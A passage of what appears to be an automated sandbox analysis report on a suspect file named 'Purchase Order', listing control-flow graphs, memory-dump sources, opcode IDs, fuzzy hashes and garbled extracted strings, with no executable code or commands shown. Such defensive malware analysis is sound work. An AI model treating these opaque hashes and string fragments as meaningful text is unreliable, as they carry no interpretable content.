                                                                                                  • Instruction Fuzzy Hash: 23A1D774E402189FDB18DFA9D894ADDBBF2BF89310F148069E419AB361DB349D85CF90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 877 11cd28-11cd34 878 11cd36-11cd58 877->878 879 11cd8d-11ce3c call 1141a0 call 113cc0 877->879 880 11cd5a 878->880 881 11cd5f-11cd8c 878->881 891 11ce43-11ce64 call 116320 879->891 892 11ce3e 879->892 880->881 881->879 894 11ce69-11ce74 891->894 892->891 895 11ce76 894->895 896 11ce7b-11ce7f 894->896 895->896 897 11ce81-11ce82 896->897 898 11ce84-11ce8b 896->898 899 11cea3-11cee7 897->899 900 11ce92-11cea0 898->900 901 11ce8d 898->901 905 11cf4d-11cf64 899->905 900->899 901->900 907 11cf66-11cf8b 905->907 908 11cee9-11ceff 905->908 915 11cfa3 907->915 916 11cf8d-11cfa2 907->916 912 11cf01-11cf0d 908->912 913 11cf29 908->913 917 11cf17-11cf1d 912->917 918 11cf0f-11cf15 912->918 914 11cf2f-11cf4c 913->914 914->905 916->915 919 11cf27 917->919 918->919 919->914
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                  • API String ID: 0-1229222154
                                                                                                  • Opcode ID: d91f21427a07aa575ebb243d0f5fd9a716194b6791bbbdb5470926f92b8a9e65
                                                                                                  • Instruction ID: 4f2b89ca648dd19c0d8fa5b11a582cc9513e4d0b274b3c8ae690e43947ed6581
                                                                                                  • Opcode Fuzzy Hash: d91f21427a07aa575ebb243d0f5fd9a716194b6791bbbdb5470926f92b8a9e65
                                                                                                  • Instruction Fuzzy Hash: 2181C374E00258CFDB18DFAAD884ADDBBF2BF89300F148069E419AB365DB349985CF50

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 923 115370-1153a0 924 1153a2 923->924 925 1153a7-115484 call 1141a0 call 113cc0 923->925 924->925 935 115486 925->935 936 11548b-1154ac call 116320 925->936 935->936 937 1154b2-1154bd 936->937 938 1154c4-1154c8 937->938 939 1154bf 937->939 940 1154ca-1154cb 938->940 941 1154cd-1154d4 938->941 939->938 942 1154ec-115530 940->942 943 1154d6 941->943 944 1154db-1154e9 941->944 948 115596-1155ad 942->948 943->944 944->942 950 115532-115548 948->950 951 1155af-1155d4 948->951 955 115572 950->955 956 11554a-115556 950->956 960 1155d6-1155eb 951->960 961 1155ec 951->961 959 115578-115595 955->959 957 115560-115566 956->957 958 115558-11555e 956->958 962 115570 957->962 958->962 959->948 960->961 962->959
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                  • API String ID: 0-1229222154
                                                                                                  • Opcode ID: 99c5e67cdf945c24539d31d2cbdeb6f6f6687643a32b6b2b12e3cec602a6df26
                                                                                                  • Instruction ID: 1d37b3e9c4689db2995244e5bdd436982b539693cb22f20b8da32c1f33d7f62b
                                                                                                  • Opcode Fuzzy Hash: 99c5e67cdf945c24539d31d2cbdeb6f6f6687643a32b6b2b12e3cec602a6df26
                                                                                                  • Instruction Fuzzy Hash: 4B81B474E00618CFDB58DFA9D984A9DBBF2BF88300F14C169E419AB365DB349985CF50

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 967 115c38-115c68 968 115c6a 967->968 969 115c6f-115d4c call 1141a0 call 113cc0 967->969 968->969 979 115d53-115d74 call 116320 969->979 980 115d4e 969->980 981 115d7a-115d85 979->981 980->979 982 115d87 981->982 983 115d8c-115d90 981->983 982->983 984 115d92-115d93 983->984 985 115d95-115d9c 983->985 986 115db4-115df8 984->986 987 115da3-115db1 985->987 988 115d9e 985->988 992 115e5e-115e75 986->992 987->986 988->987 994 115e77-115e9c 992->994 995 115dfa-115e10 992->995 1001 115eb4 994->1001 1002 115e9e-115eb3 994->1002 999 115e12-115e1e 995->999 1000 115e3a 995->1000 1003 115e20-115e26 999->1003 1004 115e28-115e2e 999->1004 1005 115e40-115e5d 1000->1005 1002->1001 1006 115e38 1003->1006 1004->1006 1005->992 1006->1005
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                  • API String ID: 0-1229222154
                                                                                                  • Opcode ID: de24d2fb04637abda50af5b8938218138ccdeeb6e626f8291e1f3ed4876c3d5e
                                                                                                  • Instruction ID: 1cea5feaf20d8489dcaf721c8b5a0f6a1a33b34148f55c5063c29eeef4acb24c
                                                                                                  • Opcode Fuzzy Hash: de24d2fb04637abda50af5b8938218138ccdeeb6e626f8291e1f3ed4876c3d5e
                                                                                                  • Instruction Fuzzy Hash: FA81A174E01618CFDB18DFA9D884A9DBBF2BF88300F14C069E819AB365DB349981CF50

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1011 11cff7-11d028 1012 11d02a 1011->1012 1013 11d02f-11d08e call 1141a0 1011->1013 1012->1013 1017 11d093-11d10c call 113cc0 1013->1017 1023 11d113-11d144 call 116320 1017->1023 1024 11d10e 1017->1024 1027 11d146 1023->1027 1028 11d14b-11d14f 1023->1028 1024->1023 1027->1028 1029 11d151-11d152 1028->1029 1030 11d154-11d15b 1028->1030 1031 11d173-11d1b7 1029->1031 1032 11d162-11d170 1030->1032 1033 11d15d 1030->1033 1037 11d21d-11d234 1031->1037 1032->1031 1033->1032 1039 11d236-11d25b 1037->1039 1040 11d1b9-11d1cf 1037->1040 1049 11d273 1039->1049 1050 11d25d-11d272 1039->1050 1044 11d1d1-11d1dd 1040->1044 1045 11d1f9 1040->1045 1046 11d1e7-11d1ed 1044->1046 1047 11d1df-11d1e5 1044->1047 1048 11d1ff-11d21c 1045->1048 1051 11d1f7 1046->1051 1047->1051 1048->1037 1050->1049 1051->1048
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                  • API String ID: 0-1229222154
                                                                                                  • Opcode ID: 7fddbcb1a062ed983d3728537bb7b6006a7f89f028fabe09a85eaa9cd29867f0
                                                                                                  • Instruction ID: a2818e044758e060f5a38ca7a85ab36d1ff1d248b6ab1457ebca4eaa5bcfb7fd
                                                                                                  • Opcode Fuzzy Hash: 7fddbcb1a062ed983d3728537bb7b6006a7f89f028fabe09a85eaa9cd29867f0
                                                                                                  • Instruction Fuzzy Hash: E5818274E00218DFDB18DFAAD984A9DBBF2BF89310F14C069E419AB365DB349985CF50

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1055 11d2ca-11d2f8 1056 11d2fa 1055->1056 1057 11d2ff-11d3dc call 1141a0 call 113cc0 1055->1057 1056->1057 1067 11d3e3-11d404 call 116320 1057->1067 1068 11d3de 1057->1068 1070 11d409-11d414 1067->1070 1068->1067 1071 11d416 1070->1071 1072 11d41b-11d41f 1070->1072 1071->1072 1073 11d421-11d422 1072->1073 1074 11d424-11d42b 1072->1074 1075 11d443-11d487 1073->1075 1076 11d432-11d440 1074->1076 1077 11d42d 1074->1077 1081 11d4ed-11d504 1075->1081 1076->1075 1077->1076 1083 11d506-11d52b 1081->1083 1084 11d489-11d49f 1081->1084 1091 11d543 1083->1091 1092 11d52d-11d542 1083->1092 1088 11d4a1-11d4ad 1084->1088 1089 11d4c9 1084->1089 1093 11d4b7-11d4bd 1088->1093 1094 11d4af-11d4b5 1088->1094 1090 11d4cf-11d4ec 1089->1090 1090->1081 1092->1091 1095 11d4c7 1093->1095 1094->1095 1095->1090
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                  • API String ID: 0-1229222154
                                                                                                  • Opcode ID: cefe07564ccdb8ca2c712aa55b02ec107498bac0c38a173a7dfa4bf39c546ef0
                                                                                                  • Instruction ID: 6867f8c758c612bf843a046ce68dd50d24a2a8cba04dd7b26c74009bc71cf540
                                                                                                  • Opcode Fuzzy Hash: cefe07564ccdb8ca2c712aa55b02ec107498bac0c38a173a7dfa4bf39c546ef0
                                                                                                  • Instruction Fuzzy Hash: 8181A474E00218DFDB18DFAAD984ADDBBF2BF89310F148069E419AB365DB349985CF50

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1099 11d599-11d5c8 1100 11d5ca 1099->1100 1101 11d5cf-11d6ac call 1141a0 call 113cc0 1099->1101 1100->1101 1111 11d6b3-11d6d4 call 116320 1101->1111 1112 11d6ae 1101->1112 1114 11d6d9-11d6e4 1111->1114 1112->1111 1115 11d6e6 1114->1115 1116 11d6eb-11d6ef 1114->1116 1115->1116 1117 11d6f1-11d6f2 1116->1117 1118 11d6f4-11d6fb 1116->1118 1119 11d713-11d757 1117->1119 1120 11d702-11d710 1118->1120 1121 11d6fd 1118->1121 1125 11d7bd-11d7d4 1119->1125 1120->1119 1121->1120 1127 11d7d6-11d7fb 1125->1127 1128 11d759-11d76f 1125->1128 1135 11d813 1127->1135 1136 11d7fd-11d812 1127->1136 1132 11d771-11d77d 1128->1132 1133 11d799 1128->1133 1137 11d787-11d78d 1132->1137 1138 11d77f-11d785 1132->1138 1134 11d79f-11d7bc 1133->1134 1134->1125 1136->1135 1139 11d797 1137->1139 1138->1139 1139->1134
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                  • API String ID: 0-1229222154
                                                                                                  • Opcode ID: cb74813b3984b81b0f335a748b91eda5db9f6bdd49fdc201ea0f311c065830be
                                                                                                  • Instruction ID: d4d7952b52d027a21ed4f1f2c4203797a2f0f5fed224fb989adeaf0686ed9fd9
                                                                                                  • Opcode Fuzzy Hash: cb74813b3984b81b0f335a748b91eda5db9f6bdd49fdc201ea0f311c065830be
                                                                                                  • Instruction Fuzzy Hash: CC819274E01218DFDB18DFAAD984A9DBBF2BF88310F148069E419AB365DB349985CF50

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1187 1129ec-1129f6 1189 112981-11298a 1187->1189 1190 1129f8-112a01 1187->1190 1191 112990-112999 1189->1191 1190->1191 1192 112a03-112a3b 1190->1192 1197 1129a0-1129c8 1191->1197 1195 112a5d-112aac 1192->1195 1196 112a3d-112a5c 1192->1196 1202 112ac7-112acf 1195->1202 1203 112aae-112ab5 1195->1203 1207 112ad2-112ae6 1202->1207 1204 112ab7-112abc 1203->1204 1205 112abe-112ac5 1203->1205 1204->1207 1205->1207 1209 112ae8-112aef 1207->1209 1210 112afc-112b04 1207->1210 1211 112af1-112af3 1209->1211 1212 112af5-112afa 1209->1212 1213 112b06-112b0a 1210->1213 1211->1213 1212->1213 1215 112b6a-112b6d 1213->1215 1216 112b0c-112b21 1213->1216 1217 112bb5-112bbb 1215->1217 1218 112b6f-112b84 1215->1218 1216->1215 1224 112b23-112b26 1216->1224 1219 112bc1-112bc3 1217->1219 1220 1136b6 1217->1220 1218->1217 1230 112b86-112b8a 1218->1230 1219->1220 1222 112bc9-112bce 1219->1222 1227 1136bb-113700 1220->1227 1228 113664-113668 1222->1228 1229 112bd4 1222->1229 1225 112b45-112b63 call 1102c8 1224->1225 1226 112b28-112b2a 1224->1226 1225->1215 1226->1225 1231 112b2c-112b2f 1226->1231 1248 113702-113728 1227->1248 1249 11372e-113874 1227->1249 1233 11366a-11366d 1228->1233 1234 11366f-1136b5 1228->1234 1229->1228 1235 112b92-112bb0 call 1102c8 1230->1235 1236 112b8c-112b90 1230->1236 1231->1215 1238 112b31-112b43 1231->1238 1233->1227 1233->1234 1235->1217 1236->1217 1236->1235 1238->1215 1238->1225 1248->1249 1250 1138a6-1138a9 1249->1250 1251 113876-113878 1249->1251 1252 1138aa-1138bc 1250->1252 1251->1252 1253 11387a-1138a3 1251->1253 1256 1138ee-1138f4 1252->1256 1257 1138be-1138eb 1252->1257 1253->1250 1259 1138f6-113908 1256->1259 1260 113928-113937 1256->1260 1257->1256 1262 11393a-11393d 1259->1262 1263 11390a-11390c 1259->1263 1260->1262 1264 11393e-113941 1262->1264 1263->1264 1265 11390e-113910 1263->1265 1266 113942-1139e8 1264->1266 1265->1266 1267 113912-113927 1265->1267 1267->1260
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                  • API String ID: 0-4015495023
                                                                                                  • Opcode ID: f16079a8ea7e592a13e674b8076726f892dbf02d1ddae77497f1f5d9e4c61cf3
                                                                                                  • Instruction ID: 74bc381b6724cbd711981b0295782170a16353472aadef6d8715c59e2cf2d1e0
                                                                                                  • Opcode Fuzzy Hash: f16079a8ea7e592a13e674b8076726f892dbf02d1ddae77497f1f5d9e4c61cf3
                                                                                                  • Instruction Fuzzy Hash: 6E02F13184D3D18FCBA78B788C6019A7FB2AF47214B5A04FAC8818A563E3794D86CB51

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1268 1181e0-118203 1269 118205-11820b 1268->1269 1270 11820e-11822e 1268->1270 1269->1270 1273 118230 1270->1273 1274 118235-11823c 1270->1274 1275 1185c4-1185cd 1273->1275 1276 11823e-118249 1274->1276 1277 1185d5-1185e1 1276->1277 1278 11824f-118262 1276->1278 1281 118264-118272 1278->1281 1282 118278-118293 1278->1282 1281->1282 1287 11854c-118553 1281->1287 1285 118295-11829b 1282->1285 1286 1182b7-1182ba 1282->1286 1288 1182a4-1182a7 1285->1288 1289 11829d 1285->1289 1291 1182c0-1182c3 1286->1291 1292 118414-11841a 1286->1292 1287->1275 1290 118555-118557 1287->1290 1294 1182da-1182e0 1288->1294 1295 1182a9-1182ac 1288->1295 1289->1288 1289->1292 1293 118506-118509 1289->1293 1289->1294 1296 118566-11856c 1290->1296 1297 118559-11855e 1290->1297 1291->1292 1299 1182c9-1182cf 1291->1299 1292->1293 1298 118420-118425 1292->1298 1304 1185d0 1293->1304 1305 11850f-118515 1293->1305 1306 1182e2-1182e4 1294->1306 1307 1182e6-1182e8 1294->1307 1300 1182b2 1295->1300 1301 118346-11834c 1295->1301 1296->1277 1302 11856e-118573 1296->1302 1297->1296 1298->1293 1299->1292 1303 1182d5 1299->1303 1300->1293 1301->1293 1310 118352-118358 1301->1310 1308 118575-11857a 1302->1308 1309 1185b8-1185bb 1302->1309 1303->1293 1304->1277 1311 118517-11851f 1305->1311 1312 11853a-11853e 1305->1312 1313 1182f2-1182fb 1306->1313 1307->1313 1308->1304 1318 11857c 1308->1318 1309->1304 1317 1185bd-1185c2 1309->1317 1319 11835a-11835c 1310->1319 1320 11835e-118360 1310->1320 1311->1277 1321 118525-118534 1311->1321 1312->1287 1316 118540-118546 1312->1316 1314 1182fd-118308 1313->1314 1315 11830e-118336 1313->1315 1314->1293 1314->1315 1341 11842a-118460 1315->1341 1342 11833c-118341 1315->1342 1316->1276 1316->1287 1317->1275 1317->1290 1322 118583-118588 1318->1322 1323 11836a-118381 1319->1323 1320->1323 1321->1282 1321->1312 1327 1185aa-1185ac 1322->1327 1328 11858a-11858c 1322->1328 1334 118383-11839c 1323->1334 1335 1183ac-1183d3 1323->1335 1327->1304 1330 1185ae-1185b1 1327->1330 1331 11859b-1185a1 1328->1331 1332 11858e-118593 1328->1332 1330->1309 1331->1277 1333 1185a3-1185a8 1331->1333 1332->1331 1333->1327 1337 11857e-118581 1333->1337 1334->1341 1345 1183a2-1183a7 1334->1345 1335->1304 1347 1183d9-1183dc 1335->1347 1337->1304 1337->1322 1348 118462-118466 1341->1348 1349 11846d-118475 1341->1349 1342->1341 1345->1341 1347->1304 1350 1183e2-11840b 1347->1350 1351 118485-118489 1348->1351 1352 118468-11846b 1348->1352 1349->1304 1353 11847b-118480 1349->1353 1350->1341 1365 11840d-118412 1350->1365 1355 1184a8-1184ac 1351->1355 1356 11848b-118491 1351->1356 1352->1349 1352->1351 1353->1293 1358 1184b6-1184d2 1355->1358 1359 1184ae-1184b4 1355->1359 1356->1355 1357 118493-11849b 1356->1357 1357->1304 1361 1184a1-1184a6 1357->1361 1362 1184db-1184df 1358->1362 1359->1358 1359->1362 1361->1293 1362->1293 1363 1184e1-1184fd 1362->1363 1363->1293 1365->1341
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (o]q$(o]q$,aq$,aq
                                                                                                  • API String ID: 0-1947289240
                                                                                                  • Opcode ID: c909cbbf7b06a0c313fd43c3ddc88e9016ba9ca3f8f8055064f48100c5300773
                                                                                                  • Instruction ID: ffac7383b59452487c8a7e189ed78ba338afee464412e62f5d686d293cca03bc
                                                                                                  • Opcode Fuzzy Hash: c909cbbf7b06a0c313fd43c3ddc88e9016ba9ca3f8f8055064f48100c5300773
                                                                                                  • Instruction Fuzzy Hash: EFD1E970A00119DFCB59CFA9D984AEDBBB2FF88344F25C165E815AB265DB30ED81CB50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: N
                                                                                                  • API String ID: 0-1130791706
                                                                                                  • Opcode ID: 0ee9c5e34f3cd09f4a92e87ddc84f1f122e74a3ed394834e23d49f9b5fde2fdb
                                                                                                  • Instruction ID: b642c58e8578763af217c1b27f35fced25df75da036f9762433fde7024e323fe
                                                                                                  • Opcode Fuzzy Hash: 0ee9c5e34f3cd09f4a92e87ddc84f1f122e74a3ed394834e23d49f9b5fde2fdb
                                                                                                  • Instruction Fuzzy Hash: 77730731C1075A8EDB11EF68C854A9DF7B1FF99300F51D69AE4486B221EB70AAD4CF81
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0o@p$PH]q$PH]q
                                                                                                  • API String ID: 0-2023588385
                                                                                                  • Opcode ID: b9d9b06a6cc64bb5b831a7ce49666e07f67bd14c09b80c7aea1a36b3b45486e0
                                                                                                  • Instruction ID: 919c208cc618cd259c0d1ac9f625340845b7c93aefeaddadc3a505ee6e672fbc
                                                                                                  • Opcode Fuzzy Hash: b9d9b06a6cc64bb5b831a7ce49666e07f67bd14c09b80c7aea1a36b3b45486e0
                                                                                                  • Instruction Fuzzy Hash: 4D61B574E406089FDB18DFAAD984ADDBBF2BF89300F14C069E418AB365DB349985CF50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: K
                                                                                                  • API String ID: 0-856455061
                                                                                                  • Opcode ID: 4779c0ca92b4d6e67f818f331c512e639791ffecab0f2e6aa42c178609b3f60d
                                                                                                  • Instruction ID: 2e36555ba3c458a23559103a44314141a272fd78e5349425e02f87e2ea70c16c
                                                                                                  • Opcode Fuzzy Hash: 4779c0ca92b4d6e67f818f331c512e639791ffecab0f2e6aa42c178609b3f60d
                                                                                                  • Instruction Fuzzy Hash: CD33E430C146198EDB11EF68C854ADDFBB5FF99300F51D69AE4486B221EB70AAD4CF81
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (o]q$4']q
                                                                                                  • API String ID: 0-176817397
                                                                                                  • Opcode ID: a5f8765d773437d7c73fcc58a9235a8427838b810f8345f18641d8c1dd40e86c
                                                                                                  • Instruction ID: 273e84edfac60c3a8756c448fc22fffdafe7f223fd855dce77648438f138993a
                                                                                                  • Opcode Fuzzy Hash: a5f8765d773437d7c73fcc58a9235a8427838b810f8345f18641d8c1dd40e86c
                                                                                                  • Instruction Fuzzy Hash: 71826C74A08209DFCB19CF68C994AEEBBF2FF89310F158565E4059B2A1D730ED85CB91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PH]q$PH]q
                                                                                                  • API String ID: 0-1166926398
                                                                                                  • Opcode ID: 582c6b74e9ada20c4bd1ffbcfb4c8ccbad7bd9a9efefbd97b1f91262e4aaeb7f
                                                                                                  • Instruction ID: 24ab11028735eb76e8b0bc7c81c01a5d3ddaf24ea872269399d4bed7801115b9
                                                                                                  • Opcode Fuzzy Hash: 582c6b74e9ada20c4bd1ffbcfb4c8ccbad7bd9a9efefbd97b1f91262e4aaeb7f
                                                                                                  • Instruction Fuzzy Hash: 6D81BE74E00219CFEB18DFAAD994B9DBBF2BF89300F20816AD419AB354DB345946CF50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8
                                                                                                  • API String ID: 0-4194326291
                                                                                                  • Opcode ID: de126c642a97ce77e63ea4974595a205a25201d7bae7d26690aa40d9f62edbf7
                                                                                                  • Instruction ID: 67937d9cefd19a9d5ae44a1ff1e850b44898ab3c10c68136cbe739e326235662
                                                                                                  • Opcode Fuzzy Hash: de126c642a97ce77e63ea4974595a205a25201d7bae7d26690aa40d9f62edbf7
                                                                                                  • Instruction Fuzzy Hash: 5B415AB1D016188BEB58CF5BC9447DEFAF3AFC9304F14C1A9D40CA6264EB754A858F51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387027047.0000000039D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d30000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0e17dca1bbec754c0bfcbbe11454b395d64f03ad4889b50aa187ff5ae151e607
                                                                                                  • Instruction ID: 45609d994dc6c3a23f3ece7887bf65ada89ab16f513b5b67c8c2f6858360a4a0
                                                                                                  • Opcode Fuzzy Hash: 0e17dca1bbec754c0bfcbbe11454b395d64f03ad4889b50aa187ff5ae151e607
                                                                                                  • Instruction Fuzzy Hash: C7827974E012288FDB64DF69CD95BD9BBB2BF89300F1081E9984DA7265DB346E85CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387027047.0000000039D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d30000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1a769744a8661d7a1b82d1ad2e713b6f3d7e8a11e1b41930b8d81ee6f6f0761a
                                                                                                  • Instruction ID: 2a7f3881f93254e071c105a0979e43738473aae5831a4ad9317a24ae8ff343e2
                                                                                                  • Opcode Fuzzy Hash: 1a769744a8661d7a1b82d1ad2e713b6f3d7e8a11e1b41930b8d81ee6f6f0761a
                                                                                                  • Instruction Fuzzy Hash: E9727C74E012288FDB65DF69CD95BDABBB2BF89300F1081E9A44CA7261DB345E81CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 81a0fb991e485fa97992778f869b7310b18f43e144a95055e2c8303208b5940e
                                                                                                  • Instruction ID: cac2b4418f2ba9ce779c9e4b6c6461404b12ac184da1af3a0976c88fdf8163ea
                                                                                                  • Opcode Fuzzy Hash: 81a0fb991e485fa97992778f869b7310b18f43e144a95055e2c8303208b5940e
                                                                                                  • Instruction Fuzzy Hash: DF223AB4E00219CFDB14DFA8C994B9DBBB6BF88304F5086A9D809AB355DB349D85CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fcfcd5492ba7c6f2adb255fdc57d42b8c73eb65a4a0d4f796982673bd286acfe
                                                                                                  • Instruction ID: 5a31b42bdebedf916a148e718a1ce26b1dfd8f73282112bf3502acf7c2ba059a
                                                                                                  • Opcode Fuzzy Hash: fcfcd5492ba7c6f2adb255fdc57d42b8c73eb65a4a0d4f796982673bd286acfe
                                                                                                  • Instruction Fuzzy Hash: 7AE1BFB4E01218CFDB64CFA9D944B9DBBB2BF89300F1081A9D808BB365DB355A85CF55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c6f8d2b8bf2415e95c062aa5b01f2de9bd1d40af807e99908a9b96b84ffa176b
